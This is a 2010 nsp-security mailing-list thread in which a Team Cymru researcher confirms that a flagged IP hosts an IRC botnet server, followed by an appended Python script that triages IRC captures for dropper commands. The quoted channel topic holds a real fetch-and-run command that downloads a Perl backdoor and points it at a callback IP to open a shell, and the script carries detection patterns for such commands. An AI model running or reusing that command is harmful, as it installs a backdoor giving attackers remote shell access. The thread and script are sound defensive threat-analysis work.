[nsp-sec] 72.55.133.149

Stephen Gill gillsr at cymru.com
Wed May 5 11:41:41 EDT 2010


Looks naughty:

:Pucioasa.RO.EU.Undernet.Org 001 foo :Welcome to the Internet Relay Network foo
:Pucioasa.RO.EU.Undernet.Org 002 foo :Your host is Pucioasa.RO.EU.Undernet.Org, running version beware1.5.7
:Pucioasa.RO.EU.Undernet.Org 003 foo :This server was created Tue Jul 13 2004 at 20:36:17 GMT
:Pucioasa.RO.EU.Undernet.Org 004 foo Pucioasa.RO.EU.Undernet.Org beware1.5.7 dgikoswx biklmnoprstv
:Pucioasa.RO.EU.Undernet.Org 005 foo MAP SILENCE=15 WHOX WALLCHOPS WALLVOICES USERIP CPRIVMSG CNOTICE MODES=6 MAXCHANNELS=15 MAXBANS=45 :are supported by this server
:Pucioasa.RO.EU.Undernet.Org 005 foo NICKLEN=12 TOPICLEN=160 AWAYLEN=160 KICKLEN=160 CHANTYPES=#& PREFIX=(ov)@+ CHANMODES=b,k,l,rimnpst CASEMAPPING=rfc1459 :are supported by this server
:Pucioasa.RO.EU.Undernet.Org 251 foo :There are 2 users and 52 invisible on 1 servers
:Pucioasa.RO.EU.Undernet.Org 252 foo 1 :operator(s) online
:Pucioasa.RO.EU.Undernet.Org 254 foo 2 :channels formed
:Pucioasa.RO.EU.Undernet.Org 255 foo :I have 54 clients and 0 servers
:Pucioasa.RO.EU.Undernet.Org NOTICE foo :Highest connection count: 64 (64 clients)
:Pucioasa.RO.EU.Undernet.Org 422 foo :MOTD File is missing
:Pucioasa.RO.EU.Undernet.Org NOTICE foo :on 1 ca 1(4) ft 10(10)
LIST
:Pucioasa.RO.EU.Undernet.Org 321 foo Channel :Users  Name
:Pucioasa.RO.EU.Undernet.Org 322 foo #drone 5 :
:Pucioasa.RO.EU.Undernet.Org 322 foo #flood 48 :cd /tmp;wget arkstock.com/help/inc/dc.txt;perl dc.txt 76.74.156.155 23
:Pucioasa.RO.EU.Undernet.Org 323 foo :End of /LIST


Dc.txt is a backdoor, instructed to connect to 76.74.156.155 23 and spawn a
shell.

-- steve


On 5/5/10 8:27 AM, "Chris Calvert" <Chris.Calvert at telus.com> wrote:

> ----------- nsp-security Confidential --------
> 
> Can anyone (incl Team Cymru) comment on what they are seeing regarding these
> entries in the rsv2 and dnsrr lists?
> 
> 32613 | IWEB-AS - iWeb Technologies Inc. | 72.55.133.149 | tcp | 6667 | 2010-04-27 22:51:50 | 2010-05-05 22:51:50 | bot | 0 | 1 | ID: Pucioasa.RO.EU.Undernet.ORG
> 
> fedora.unixcod.com    BOTNET  A    72.55.133.149    32613    2010-04-26 02:31:49    STALE    TCP 6667
> 
> The host is a webhosting platform, and there is legitimate content hosted at
> the IP. I want to make sure it is a definite source of badness.
> 
> Thanks,
> 
> Chris
> TELUS - AS852
> 
> 
> 
> 
> _______________________________________________
> nsp-security mailing list
> nsp-security at puck.nether.net
> https://puck.nether.net/mailman/listinfo/nsp-security
> 
> Please do not Forward, CC, or BCC this E-mail outside of the nsp-security
> community. Confidentiality is essential for effective Internet security
> counter-measures.
> _______________________________________________

-- 
Stephen Gill, Chief Scientist, Team Cymru
http://www.cymru.com | +1 630 230 5423 | gillsr at cymru.com
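Triaging a capture like the one above mechanically, as an added example that is not part of the original post or of Team Cymru's tooling: the script below splits raw IRC server lines into prefix, command and parameters (RFC 1459 message form), records the server name and daemon version from numeric 004, and checks each /LIST entry (numeric 322) for a fetch-then-execute one-liner, pulling out the download source and the host/port the dropper is told to call. The sample is the post's own exchange with the mailer's line wraps joined and unused numerics dropped; the fetcher and interpreter keyword lists are assumptions for illustration, not a complete signature set.

```python
"""Triage a captured IRC server exchange for botnet-style channel topics.

Added example, not code from the original post or from Team Cymru.  It
parses raw server lines in RFC 1459 message form (optional ":prefix",
command, middle params, trailing ":text"), records the server identity
from numeric 004, and inspects every /LIST reply (numeric 322) for a
download-and-execute one-liner of the kind seen in the #flood topic.
The keyword lists below are illustrative assumptions, not a signature set.
"""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Constructed sample: the exchange quoted in the post, with the lines the
# mailer had wrapped joined back together and the unused numerics dropped.
SAMPLE = """\
:Pucioasa.RO.EU.Undernet.Org 001 foo :Welcome to the Internet Relay Network foo
:Pucioasa.RO.EU.Undernet.Org 004 foo Pucioasa.RO.EU.Undernet.Org beware1.5.7 dgikoswx biklmnoprstv
:Pucioasa.RO.EU.Undernet.Org 251 foo :There are 2 users and 52 invisible on 1 servers
:Pucioasa.RO.EU.Undernet.Org 321 foo Channel :Users  Name
:Pucioasa.RO.EU.Undernet.Org 322 foo #drone 5 :
:Pucioasa.RO.EU.Undernet.Org 322 foo #flood 48 :cd /tmp;wget arkstock.com/help/inc/dc.txt;perl dc.txt 76.74.156.155 23
:Pucioasa.RO.EU.Undernet.Org 323 foo :End of /LIST
"""

# A shell word that stops at the next command in a ;-chain or pipeline.
_WORD = r"[^\s;&|]+"
# Download stage: fetcher, optional flags, then the source URL/path.
DOWNLOADER = re.compile(r"\b(wget|curl|fetch|tftp|lwp-download)\b\s+(?:-\S+\s+)*(" + _WORD + ")")
# Execution stage: interpreter, script, then whatever arguments follow it.
EXECUTOR = re.compile(r"\b(perl|python|sh|bash|php)\s+(" + _WORD + r")((?:\s+" + _WORD + ")*)")
# "<dotted-quad> <port>" argument pair, the call-back target given to the script.
HOSTPORT = re.compile(r"\b((?:\d{1,3}\.){3}\d{1,3})\s+(\d{1,5})\b")


def parse_line(line: str) -> Tuple[Optional[str], str, List[str]]:
    """Split one IRC message into (prefix, command, params); trailing text is the last param."""
    line = line.rstrip("\r\n")
    prefix = None
    if line.startswith(":"):
        prefix, _, line = line[1:].partition(" ")
    trailing = None
    if " :" in line:
        line, _, trailing = line.partition(" :")
    parts = line.split()
    command, params = parts[0], parts[1:]
    if trailing is not None:
        params.append(trailing)
    return prefix, command, params


@dataclass
class Finding:
    channel: str
    users: int
    topic: str
    downloader_url: Optional[str] = None
    interpreter: Optional[str] = None
    script: Optional[str] = None
    callback: Optional[Tuple[str, int]] = None

    @property
    def suspicious(self) -> bool:
        # A fetch stage and an execute stage in one topic is the dropper pattern.
        return bool(self.downloader_url and self.interpreter)


def inspect_topic(channel: str, users: int, topic: str) -> Finding:
    """Pull the download source, interpreter, script and call-back target out of a topic."""
    f = Finding(channel, users, topic)
    m = DOWNLOADER.search(topic)
    if m:
        f.downloader_url = m.group(2)
    m = EXECUTOR.search(topic)
    if m:
        f.interpreter, f.script = m.group(1), m.group(2)
        hp = HOSTPORT.search(m.group(3))
        if hp:
            f.callback = (hp.group(1), int(hp.group(2)))
    return f


def triage(capture: str):
    """Return (server identity from 004 or None, one Finding per 322 reply)."""
    server = None
    findings = []
    for raw in capture.splitlines():
        if not raw.strip():
            continue
        _, command, params = parse_line(raw)
        if command == "004" and len(params) >= 3:
            server = (params[1], params[2])  # server name, daemon version
        elif command == "322" and len(params) >= 4:
            users = int(params[2]) if params[2].isdigit() else 0
            findings.append(inspect_topic(params[1], users, params[3]))
    return server, findings


if __name__ == "__main__":
    srv, found = triage(SAMPLE)
    print("server:", srv)
    for f in found:
        flag = "SUSPICIOUS" if f.suspicious else "ok"
        print(f"{flag:10} {f.channel} users={f.users} fetch={f.downloader_url} "
              f"run={f.interpreter} {f.script} callback={f.callback}")
```

Run against a saved session transcript (the output of an interactive `nc host 6667` with `NICK`/`USER`/`LIST` typed in) rather than a live connection; the point is to get the indicators out of a capture you already hold, not to poll the server again.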